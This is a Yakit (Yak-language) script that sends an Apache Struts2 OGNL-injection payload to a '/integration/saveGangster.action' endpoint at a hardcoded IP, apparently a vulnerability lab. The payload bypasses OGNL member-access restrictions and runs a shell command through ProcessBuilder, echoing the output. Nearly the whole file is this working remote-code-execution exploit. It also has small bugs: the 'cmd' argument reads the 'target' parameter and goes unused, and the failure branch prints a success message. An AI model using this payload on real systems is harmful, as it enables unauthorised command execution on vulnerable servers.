yakit.AutoInitYakit()

log.setLevel("info")

yakit.Info("[+]开始接受参数")

target = cli.String("target")
cmd = cli.String("target")

sendPacket = func (target, cmd){
    return poc.HTTP(`
POST /integration/saveGangster.action HTTP/1.1
Host: 123.58.224.8:36596
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: max-age=0
Content-Length: 55
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=EDD4642CAEF39D6656224D16B9FAB068
Origin: http://123.58.224.8:32326
Referer: http://123.58.224.8:32326/integration/editGangster.action
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

name={{url(%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())})}}&age=1&__checkbox_bustedBefore=true&description=1`,
        poc.params({
            "target": target,
            "cmd": cmd,
        }),
    )
}


rsp, req, err = sendPacket(target, cmd)
header, body = poc.Split(rsp)

if str.MatchAllOfSubString(header, "200")  {
    yakit.Info("[+] 命令执行成功")
    yakit.Info("[+] 回显 >> " + string(body))
}else{
    yakit.Error("[-] 命令执行成功")
    die(err)
}